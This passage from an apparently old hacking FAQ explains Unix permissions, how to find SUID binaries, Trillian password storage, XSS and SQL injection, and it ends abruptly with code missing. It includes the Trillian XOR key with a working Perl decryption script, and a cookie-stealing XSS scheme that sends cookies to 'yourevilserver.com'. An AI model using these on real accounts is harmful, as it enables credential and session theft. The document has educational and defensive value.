permission listing, it's a directory - if it has a "-", it's a file of some kind. If you look at the first line, the listing for the file "myfile.php" - we can see it has permissions "rw-r--r--" - which as we have already determined means that the owner (who is listed as "wang" in that output) has read and write access, but group and all only have read access. "wheel" is the name of group which that file/directory belongs to. We also need to mention that permissions on a directory don't mean exactly the same thing as the permissions on files I explained. When dealing with permissions in relation to a directory, Read means you can view the directories contents (i.e. do an ls in it), Write means you can create/edit/delete files within the directory, and Execute determines whether a user can "cd" into a directory (i.e. move into it, just like cd in dos). Now you know how permissions are represented for files/directories - and what they mean...but how do we set/alter them? and are there other ways of representing them? Well, yes. Permissions/access is actually based on an integer number from zero to seven, the "rwxr--r--" representation is really just to make things easier. There is an integer for each set of people accessing the file (user, group, other). The type of access allowed for each number is determined by adding 1 for execute access, 2 for write access, and 4 for read access. Zero indicates no privileges. Therefore, the allowed values are: Number Permission 0 No Access 1 Execute Only 2 Write Only 3 Execute and Write 4 Read Only 5 Execute and Read 6 Read and Write 7 Read, Write, and Execute If you are feeling lost and confused, bear with me...the purpose of these numbers will become clearer. You are probably thinking - why tell me these numbers? - well it's just useful to know, and I prefer changing file/directory permissions using numbers ;) - sorry! So, what is the command to actually change permissions? - the answer is "chmod". First, lets talk about using chmod with the numbers in the table above that I gave. The format to use chmod would be: chmod So, a good example would be "chmod 755 blah.pl". Why three digits? well, we are back at the Owner, Group, All permission thing again. Every one of the three digits on the mode number corresponds to one of the three permission triplets. Every permission bit in a triplet corresponds to a value - which, despite my complex looking table, can be easily remembered as: 0 for nothing (dash), 4 for r, 2 for w, 1 for x. Lets work an example out, lets say we have the permission "rwxr-xr-x" on some file...what chmod string was used to give that file those permissions? Simple: Triplet for user: rwx => 4 + 2 + 1 = 7 Triplet for group: r-x => 4 + 0 + 1 = 5 Tripler for all: r-x => 4 + 0 + 1 = 5 Which makes : 755 It's not as hard as it looks, and it's not as hard to remember as you might think...it actually becomes second nature. There is, however, an easier way if this really does scare you. chmod can also be used in the format "chmod [options] mode file(s)". The 'mode' part specifies the new permissions for the file(s) that follow as arguments. A mode specifies which user's permissions should be changed, and afterwards which access types should be changed. Let's say for example: chmod a-x socktest.pl This means that the execute bit should be cleared (-) for all users. (owner, group and all) The permissions start with a letter specifying what users should be affected by the change, this might be any of the following: u the owner user g the owner group o Everyone, all (what we described as other users) a all users, but referring to user/group/all This is followed by a change instruction which consists of a +(set bit) or -(clear bit) and the letter corresponding to the bit that should be changed. So, hopefully now you can see where "chmod a-x socktest.pl" came from. We could also have said "chmod g-x socktest.pl" to only remove the group execute permission, or we could have said "chmod o+r socktest.pl" to give all/everyone else read access to this file. If you really want to read up more on chmod, please type "man chmod" from a shell prompt to see the manual on it. As a final example, I will show an example of me using chmod on a file "test.txt": We start with the file test.txt, which the owner "wang" has read/write access to, and group/all only have read access to: [wang@server ~/test]# ls -l total 2 -rw-r--r-- 1 wang wang 5 Aug 7 19:43 test.txt I then decided to give my group write access to test.txt, so I used chmod like so: [wang@server ~/test]# chmod 664 test.txt [wang@server ~/test]# ls -l total 2 -rw-rw-r-- 1 wang wang 5 Aug 7 19:43 test.txt Then, I gave all/everyone write access too (feeling generous!): [wang@server ~/test]# chmod o+w test.txt [wang@server ~/test]# ls -l total 2 -rw-rw-rw- 1 wang wang 5 Aug 7 19:43 test.txt Then, I take write access away from the group: [wang@server ~/test]# chmod g-w test.txt [wang@server ~/test]# ls -l total 2 -rw-r--rw- 1 wang wang 5 Aug 7 19:43 test.txt And then I decide to remove all access from group/all to leave only the owner with access to the file: [wang@server ~/test]# chmod 600 test.txt [wang@server ~/test]# ls -l total 2 -rw------- 1 wang wang 5 Aug 7 19:43 test.txt -------------------------------------------------------------------------------- What are SUID Binaries and why are they dangerous? This was a requested topic via the Hack Faq form, but is also quite a frequently asked question on the boards I see, hence I though we should cover it. If you haven't read the previous topic on Unix ownership/permissions - I suggest you do so now. Let's first establish what SUID is - SUID is short for Set User ID. As we explained in the previous topic, commands/files you execute always run with your privileges on the system - makes sense for security purposes, right? wrong - this is where SUID comes in. SUID files can be run with the privileges of the person who SUID'd them. When you run a program with the suid bit set, the program is run as the owner of the program rather than as you, the person running it. This means that when it is running the program has access to all of it's owners files and privileges. Does this sound dangerous to you? should do...because it is - but it's sometimes necessary. Let's take an example now, say the unix "passwd" command (which you can use to change your password for logging into the system). This is a typical use of the passwd program: $ passwd Changing password for wang (current) UNIX password: New UNIX password: Password changed Have you ever sat back and thought "what does it actually have to do to change my password?" - well, The passwd program has to be able to update the /etc/passwd and /etc/shadow files (or equivalent, depending on what *nix you are using), which are owned by root - so therefore, a typical binary not owner by root wouldn't be able to do it...and passwd must run as root to do this. So the dilemma is set - the program must be owner by root and modify files that only root should be able to modify - but allow you to run it as standard user. So, how does passwd achieve this? it is SUID - as the ls -l shows: -rwsr-xr-x 1 root root 27K Jul 8 17:01 passwd Notice the "s" in the privileges - that's how you identify the SUID binary. Therefore, passwd works because it's owner is root and it has the suid bit set - so we run passwd as our user, but the system automatically makes it run as root. This is all well and good, and you can no doubt see why SUID binaries are useful...however, there should also be alarm bells ringing in your heads. What if...the program was exploitable somehow - what if you could make the program execute any command you wish? if you could...it would execute any command you wish, not at your privilege level -but at the SUID level. Therefore, SUID-root programs are the largest security threat...since you can't get any better than being able to execute any command you wish as root! SUID programs are so dangerous are also very dangerous because interaction with the untrusted user begins before the program is even started. There are many ways to confuse the program, using things like environment variables, signals, or anything you want. Exactly this 'confusion' of a program is a cause of frequent buffer overflows (which we will cover). More than 50 % of all major security bugs leading to releases of security advisors are accounted to SUID programs. And some distributions of *nix are shipped with hundreds of these suid programs, most of which you'll probably never use. Of course there are few which are necessary, in order that normal user might perform operations which are normally done by root (like the passwd example). So, we have another dilemma - we don't want to have risky SUID programs on our system....but we can't delete them all. Doh. First things first...is there a quick way to find all the SUID binaries on my system? Yes - execute the following command from a shell: for i in `find / -perm +6000 -type f`; do ls -aFl $i >> suids; done This is a really good way of finding them, since it will go through searching and create a file in your current directory called "suids" which has the ls -l output of the SUID binary for you to see. If the above command doesn't work, it may be because the above command relies on GNU find, and you might be on a *nix variation with a less-friendly find...therefore try: 'find / -type f ( -perm -4000 -o -perm -2000 ) -exec ls -l {} ; If you ran the first command above, you can then just "cat suids" or read it in your favourite editor (pico suids, vi suids, vim suids, etc) to see the list of SUID binaries found. If you ran the second find string...you should see the list appear in the shell as it searches. You will see all the usual suspects there - all the SUID one's you need, such as passwd, su, mount etc - but unfortunately, since every distribution and unix system will be different, I can't tell you which ones you need and which ones you don't :( - it will be process of discovery for you. Here is just a small list of the really common "ok" expected SUID binaries (there may be a lot more on yours though, don't panic) /usr/bin/crontab /usr/bin/newgrp /usr/bin/passwd /usr/local/bin/ssh /usr/local/bin/screen-3.7.2 /usr/X11R6/bin/xload /usr/X11R6/bin/xterm /usr/X11R6/bin/XF86_Mach32 /var/qmail/bin/qmail-queue /bin/su The best way of doing it, is to log all the SUID binaries you have when you first put your system live...and then monitor the system to see if any odd SUID binaries are added at a later date. Bear in mind that a strange SUID binary appearing, could be the sign of a hacker backdooring an account. Just in case you do need to remove the SUID bit on something - it can be achieved by executing the chmod command like so: chmod -s We briefly mentioned earlier that buffer overflows are tied to SUID binaries being dangerous. This is because our worst fear, being able to make a SUID-root binary (or similar) execute any command of your choice, can come true if a buffer overflow exploit exists in the SUID program. I planned to include a topic on Buffer Overflows as the next topic in this faq volume, but I realised that there are so many excellent texts on it already, that I would only be rehashing what other people have said. I am therefore providing links to two excellent texts that deal with the subject, which I hope you will read. If there is a large demand for me to cover the topic..I will try and include it next time, but I really think the texts linked to below will help you understand the subject well enough. For further reading, check: Exploitation of stack based buffer overflows Stack Based buffer overflows, part II -------------------------------------------------------------------------------- Decrypting Trillian Passwords AS you may remember, in past hack faq's we went through the ICQ password storage technique, and how to decrypt ICQ .dat files in order to get the cleartext passwords from them. Trillian is fast becoming one of the most-popular instant messaging programs around. It is described as: "Communicate with Flexibility and Style. Trillian is everything you need for instant messaging. Connect to ICQ®, AOL Instant Messenger(SM), MSN Messenger, Yahoo! Messenger and IRC in a single, sleek and slim interface." That's right, trillian is an all-in-one program which allows you to be on ICQ, AIM (the AOL instant messenger), MSN, Yahoo, and even IRC, all at once from one program. In itself, trillian is a good program, with some nice features - but it suffers from an awful password storage system. Although not compulsory, trillian saves your password to connect to all the networks (ICQ, AOL, MSN etc) - and most people, out of convenience, will want their passwords stored. The problem is that trillian stores them with only a very weak encryption. The trillian passwords are stored separately in .ini files (which relate to each network, i.e. there is a msn.ini, and a aim.ini etc). These are stored in your trillian directory (usually c:program filestrillian) in the "users" folder. Within the users folder, the ini files will either be in a folder called "default" or a folder named after your username. For example, on my installation for testing purposes, the msn.ini was stored at: c:program filestrillianusersdefaultmsn.ini On opening this file...you find details like: [msn] auto reconnect=1 save passwords=1 idle time=15 show buddy status=1 port=1863 server=messenger.hotmail.com last msn=someone@hotmail.com connect num=10 connect sec=60 save status=1 ft port=6891 [profile 0] name=someone@hotmail.com password=A347F2B74EE9A9F6 and so on... The line "password=A347F2B74EE9A9F6" is obviously the encrypted password that we want to decrypt. Now, the encryption used here is a simple xor encryption of the original password, which is then represented as hex. If we split the password into the actual hex representation, it might make more sense: A3 47 F2 B7 4E E9 A9 F6 Ok, when beating an xor encryption...you need to know what each letter of the original password was xor'd with. Thankfully, there is an easy way to find this out - so long as you know the original pass. And, as you may guess - knowing the xor key that trillian uses to encrypt passwords, is also the key to being able to decrypt passwords that we don't know! First, we need to know what the hex value "A3" (the first value of the encrypted password) represents in standard numbers. If you know your hex, you will know that the value of "A3" is 163. I know for a fact that the first letter of my password is "P", therefore - to find out what trillian xor'd with my original "P" in order to get 163 - we do the following calculation: Numeric value of A3 = 163 Numeric (ascii) value of P = 80 Calculation: 80 XOR 163 = 243 There we go - 243 is the number that the first value of your password is xor'd with. We can test this by doing the process in reverse using this knowledge: First letter of password = P Ascii value of P = 80 XOR key for 1st char = 243 Calculation = 80 xor 243 = 163 163 in Hex = A3 Encrypted password so far: A3 Go on to 2nd character...and so on... Hopefully, you can now see how trivial it is to get the rest of the xor key numbers and how to decrypt the passwords once you have the xor key. Let me save you some time...the xor key numbers for each char are (in order): 243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000 As most passwords are usually 5-10 letters/numbers long, you will rarely need to use even a quarter of those xor keys. And just to help clarify...here is a perl script I have written which will decrypt an encrypted trillian password: #!/usr/bin/perl ################# # Trillian Password Decoder - Wang (wang@most-wanted.com) # written for hack faq Volume 9 (faqs.wangproducts.net) ################# # Uncomment if you are running as a cgi #print "Content-type: text/htmlnn"; $encrypted = "A347F2B74EE9A9F6"; # put your encrypted password here! $xorkeys = "243, 038, 129, 196, 057, 134, 219, 146, 113, 163, 185, 230, 083, 122, 149, 124, 000, 000, 000, 000, 000, 000, 255, 000, 000, 128, 000, 000, 000, 128, 128, 000, 255, 000, 000, 000, 128, 000, 128, 000, 128, 128, 000, 000, 000, 128, 255, 000, 128, 000, 255, 000, 128, 128, 128, 000, 085, 110, 097, 098, 108, 101, 032, 116, 111, 032, 114, 101, 115, 111, 108, 118, 101, 032, 072, 084, 084, 080, 032, 112, 114, 111, 120, 000"; $pointer = 0; @keys = split(/, /, $xorkeys); print "Decrypted Password: "; foreach $key (@keys) { $passchar = chr(hex(substr($encrypted, $pointer, 2)) ^ $key); print "$passchar"; last if ($pointer == length($encrypted) - 2); $pointer += 2; } exit; -------------------------------------------------------------------------------- What is Cross Site Scripting (css/xss) ? Ok, firstly - cross site scripting is commonly referred to as xss or css - but please do not get it mixed up with the cascading style sheets (used in web pages, and also referred to by the abbreviation css). I am covering this topic, because although a lot of people have heard of it, usually from the term being mentioned in security/vulnerability advisories, there is definitely a lack of understanding when it comes to what it actually is, and why it occurs. This was a requested topic via the Hack Faq form and I decided that it would be worth covering due to it being a major cause of security vulnerabilities at the moment. Cross site scripting, in a way, took a lot of major sites (Ebay, Google, all sites running phpnuke) and software developers by surprise when it emerged as a common flaw...and there are millions cross site scripting flaws still out there, and many new one's being created every day! To understand what cross site scripting (xss) is, we need to look at what makes it possible. xss affects two things: Web browsers (such as Internet Explorer, Netscape, Mozilla, Opera) Web servers that dynamically generate pages based on unvalidated input (most web servers) Most web browsers have the capability to interpret scripts embedded in web pages downloaded from a web server. By this, we mean languages such as javascript (and also Java, VBScript, ActiveX, Flash, etc) which can be embedded in a standard html page, for example: Welcome to my page on the web. The javascript code embedded in the ">Click here All you see (if you don't look closely at the link before clicking) are the words "Click here". So, say you clicked there....the url takes you to www.someserver.com and includes the rouge javascript code in the url string - which is passed into their postmessage.cgi script. Now, if the web server sends back any page to the user which includes the value of "msg" which you submitted to the server by clicking the link - the rouge code will be sent back to your browser, which (as we earlier determined) will execute it since it thinks it's code embedded in the body of the html file. What's just happened? put simply - the person that sent you the link, has just made you execute any code they wanted you to. A hyperlink (as we have seen above) is a common way for this kind of attack to be executed, since it is easy for the attacker to use some form of url encoding to make the link you click on not so obviously malicious. A similar, yet more devious attack can also be executed via the hyperlink technique, using a link like so: Click here Note the SRC attribute in the If our "target" visited that link, they would be taken to the vulnerablescript.cgi on the hotmail server - which would then read in the "variable" from the query string...which of course contains our xss javascript code. The javascript would then access the script http://yourevilserver.com/cgi-bin/stealcookie.cgi on your server with your hotmail cookie in the query string. Since your stealcookie.cgi is logging the querystring on every request sent to it - you should then find our target's hotmail cookie sitting in your log. The next step would be to url encode (probably using hex encoding) the URL a bit, so that it's not so blatantly obvious what the link does, although this isn't 100% necessary - just depends how dumb your target is. The last step is to make the target visit that URL....which can be done in a zillion ways depending on how crafty you are - but more than likely you will just send them the hyperlink through the email like we mentioned earlier. Ok, now lets thing of xss from the other point of view - how do you prevent being exploited by it? If you are a coder or the webmaster of a site, the answer is simple - never trust user input! Always filter metacharacters and ensure that unwanted chars are removed from user input before proceeding to process/output the data. Filtering/replacing the chars < and > can go along way to prevent xss flaws cropping up - but also chars like ( and ) and # and & should be filtered or replaced. From a user point of view...never trust links from people you don't know - and try to ensure that you only follow links from the main site you want to view. Don't click on a link to hotmail from another site, always go to hotmail yourself etc. It's tough, but these measures would protect you from most xss flaws. You should also consider turning off javascript in your web browser (which prevents javascript being used as the injected code, which is common) and set your IE settings to high if you use Internet Explorer. A friend of mine who proof-read this volume also suggested - "By enforcing the Characterset for the web page (along with other security mechanisms), you can effectively do input validation through the automatic escaping of characters not found in the specified set. This is useful in mitigating damage until proper input validation and testing can take place." - so there are a few things you can do to make yourself safer. I have also been recommended the following links, which you should check out if you want to read further into this topic: Web Application Security (XSS and SQL Injection) - http://www.cgisecurity.com/lib/web_security.pdf Cross Site Scripting (XSS) FAQ - http://www.cgisecurity.com/articles/xss-faq.shtml -------------------------------------------------------------------------------- Problems with user input in scripting languages using databases (SQL statements) A number of web site are hacked as a result of something called "user input validation/filtering" - or, to be more precise - the lack of it. This topic should be a guide to web programmers (any language, php, asp, perl etc - but we will focus on php/asp examples) on how to safely deal with user input. I will also be talking about why this important, and giving examples of how sites that don't successfully filter user input can have accounts on the server compromised, or worse. I am not going to be explaining the SQL/php/asp code in much detail...so a basic knowledge of these languages will help you understand this topic a bit better ;) Firstly, what is the root cause of the problem? Is it the php/asp programming languages? is it the database backend (whether it be mysql, sql server, access db, etc)? no...the problem lies with the programmer of the site, and the users visiting the site. The problem is that when you have a form on your web site, whether it be a login form (asking for a username/password) or a comments form, or anything - you are asking the user to send information into scripts on your web site. Although 18/20 users might use the form in the intended way - there will always be 1 or 2 malicious users who will send your scripts data they didn't expect. The moral of the story is - you simply can't trust unchecked user input. However, let's not take my word for it...let's look at a simple login form in asp, which takes a username/password and validates them against a table called "users" in an access database (my comments are in green in the asp/php code): Html Code:
Username:
Password:
ASP Code for "logmein.asp" (where the html form sends it's data): And for reference...the PHP equivalent code for "logmein.asp" (where the html form sends it's data): Unable to connect to DB server at this time |
